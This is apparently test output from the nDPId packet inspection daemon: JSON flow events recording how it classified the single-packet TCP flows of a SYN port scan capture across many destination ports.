-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 